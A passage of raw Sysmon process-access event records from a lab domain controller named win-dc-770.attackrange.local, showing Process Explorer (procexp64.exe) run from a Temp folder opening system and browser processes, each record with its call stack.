I~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788418Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788417Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788416Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788415Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788414Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788413Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788412Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788411Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788410Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788409Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788408Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788407Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788406Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788405Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788404Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788403Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788402Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788401Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 